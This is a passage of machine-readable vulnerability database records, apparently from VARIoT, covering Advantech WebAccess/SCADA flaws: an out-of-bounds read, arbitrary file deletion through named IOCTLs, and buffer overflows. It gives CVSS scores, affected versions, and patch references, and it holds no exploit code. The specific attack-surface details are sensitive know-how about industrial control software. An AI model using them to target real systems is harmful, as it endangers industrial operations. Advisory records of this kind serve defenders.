"2019-05-30T00:00:00", "db": "ZDI", "id": "ZDI-19-229" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess Node spchapi Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-19-229" } ], "trust": 0.7 } }
var-201906-1024
Vulnerability from variot
In WebAccess/SCADA Versions 8.3.5 and prior, an out-of-bounds read vulnerability is caused by a lack of proper validation of user-supplied data. Exploitation of this vulnerability may allow disclosure of information. WebAccess/SCADA Contains an out-of-bounds vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within viewsrv.dll, which is accessed through the 0x2722 IOCTL in the webvrpcs process. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA 8.3.5 and earlier that could allow an attacker to cause a buffer overflow or heap overflow. Advantech WebAccess/SCADA is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple stack-based buffer-overflow vulnerabilities 3. Multiple heap-based buffer-overflow vulnerabilities 4. Multiple remote-code execution vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (â??../â??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. Advantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable. This vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in the execution of wrong data to other associated memory locations. read and write operations
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201906-1024", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.5" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess/scada", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.5" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.5" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.4" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.2" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess/scada", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.4.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75" }, { "db": "ZDI", "id": "ZDI-19-621" }, { "db": "CNVD", "id": "CNVD-2019-32477" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "db": "NVD", "id": "CVE-2019-10983" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005817" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-621" } ], "trust": 0.7 }, "cve": "CVE-2019-10983", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-10983", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-32477", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-142584", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-10983", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-10983", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 3.9, "id": "CVE-2019-10983", "impactScore": 1.4, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-10983", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2019-10983", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2019-10983", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2019-32477", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201906-1073", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-142584", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75" }, { "db": "ZDI", "id": "ZDI-19-621" }, { "db": "CNVD", "id": "CNVD-2019-32477" }, { "db": "VULHUB", "id": "VHN-142584" }, { "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "db": "CNNVD", "id": "CNNVD-201906-1073" }, { "db": "NVD", "id": "CVE-2019-10983" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In WebAccess/SCADA Versions 8.3.5 and prior, an out-of-bounds read vulnerability is caused by a lack of proper validation of user-supplied data. Exploitation of this vulnerability may allow disclosure of information. WebAccess/SCADA Contains an out-of-bounds vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within viewsrv.dll, which is accessed through the 0x2722 IOCTL in the webvrpcs process. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA 8.3.5 and earlier that could allow an attacker to cause a buffer overflow or heap overflow. Advantech WebAccess/SCADA is prone to the following security vulnerabilities:\n1. A directory-traversal vulnerability\n2. Multiple stack-based buffer-overflow vulnerabilities\n3. Multiple heap-based buffer-overflow vulnerabilities\n4. Multiple remote-code execution vulnerabilities\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (\u00e2??../\u00e2??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. \nAdvantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable. This vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in the execution of wrong data to other associated memory locations. read and write operations", "sources": [ { "db": "NVD", "id": "CVE-2019-10983" }, { "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "db": "ZDI", "id": "ZDI-19-621" }, { "db": "CNVD", "id": "CNVD-2019-32477" }, { "db": "BID", "id": "108923" }, { "db": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75" }, { "db": "VULHUB", "id": "VHN-142584" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-10983", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-19-178-05", "trust": 2.8 }, { "db": "ZDI", "id": "ZDI-19-621", "trust": 2.4 }, { "db": "BID", "id": "108923", "trust": 1.5 }, { "db": "CNNVD", "id": "CNNVD-201906-1073", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32477", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-005817", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8193", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.2350", "trust": 0.6 }, { "db": "IVD", "id": "5F89DA07-DAA5-4005-B08F-ACEC3E1B8E75", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-142584", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75" }, { "db": "ZDI", "id": "ZDI-19-621" }, { "db": "CNVD", "id": "CNVD-2019-32477" }, { "db": "VULHUB", "id": "VHN-142584" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "db": "CNNVD", "id": "CNNVD-201906-1073" }, { "db": "NVD", "id": "CVE-2019-10983" } ] }, "id": "VAR-201906-1024", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75" }, { "db": "CNVD", "id": "CNVD-2019-32477" }, { "db": "VULHUB", "id": "VHN-142584" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75" }, { "db": "CNVD", "id": "CNVD-2019-32477" } ] }, "last_update_date": "2024-11-23T21:52:09.335000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "title": "Patch for Advantech WebAccess/SCADA Buffer Overflow Vulnerability (CNVD-2019-32477)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181489" }, { "title": "Advantech WebAccess/SCADA Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=94176" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-621" }, { "db": "CNVD", "id": "CNVD-2019-32477" }, { "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "db": "CNNVD", "id": "CNNVD-201906-1073" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-125", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-142584" }, { "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "db": "NVD", "id": "CVE-2019-10983" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.5, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-621/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10983" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/108923" }, { "trust": 0.9, "url": "http://webaccess.advantech.com" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10983" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2350/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-621" }, { "db": "CNVD", "id": "CNVD-2019-32477" }, { "db": "VULHUB", "id": "VHN-142584" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "db": "CNNVD", "id": "CNNVD-201906-1073" }, { "db": "NVD", "id": "CVE-2019-10983" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75" }, { "db": "ZDI", "id": "ZDI-19-621" }, { "db": "CNVD", "id": "CNVD-2019-32477" }, { "db": "VULHUB", "id": "VHN-142584" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "db": "CNNVD", "id": "CNNVD-201906-1073" }, { "db": "NVD", "id": "CVE-2019-10983" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75" }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-621" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32477" }, { "date": "2019-06-28T00:00:00", "db": "VULHUB", "id": "VHN-142584" }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923" }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "date": "2019-06-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1073" }, { "date": "2019-06-28T21:15:11.057000", "db": "NVD", "id": "CVE-2019-10983" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-621" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32477" }, { "date": "2019-07-02T00:00:00", "db": "VULHUB", "id": "VHN-142584" }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923" }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005817" }, { "date": "2019-07-03T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1073" }, { "date": "2024-11-21T04:20:17.693000", "db": "NVD", "id": "CVE-2019-10983" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201906-1073" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "WebAccess/SCADA Vulnerable to out-of-bounds reading", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005817" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "5f89da07-daa5-4005-b08f-acec3e1b8e75" }, { "db": "CNNVD", "id": "CNNVD-201906-1073" } ], "trust": 0.8 } }
var-201810-0398
Vulnerability from variot
Advantech WebAccess 8.3.1 and earlier has a .dll component that is susceptible to external control of file name or path vulnerability, which may allow an arbitrary file deletion when processing. Advantech WebAccess Contains an input validation vulnerability.Information may be tampered with. This vulnerability allows remote attackers to delete arbitrary files on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2715 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to delete files under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. .dll is one of the dynamic link library components. A security vulnerability exists in the .dll component of Advantech WebAccess 8.3.1 and earlier. Advantech WebAccess is prone to the following security vulnerabilities: 1. A stack-based buffer overflow vulnerability 2. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0398", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess node", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.3" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1299" }, { "db": "CNVD", "id": "CNVD-2018-21919" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "db": "CNNVD", "id": "CNNVD-201810-1189" }, { "db": "NVD", "id": "CVE-2018-14820" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011086" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-18-1299" }, { "db": "BID", "id": "105728" } ], "trust": 1.0 }, "cve": "CVE-2018-14820", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2018-14820", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 7.1, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2018-14820", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2018-21919", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-125018", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2018-14820", "impactScore": 3.6, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-14820", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-14820", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2018-14820", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-21919", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": 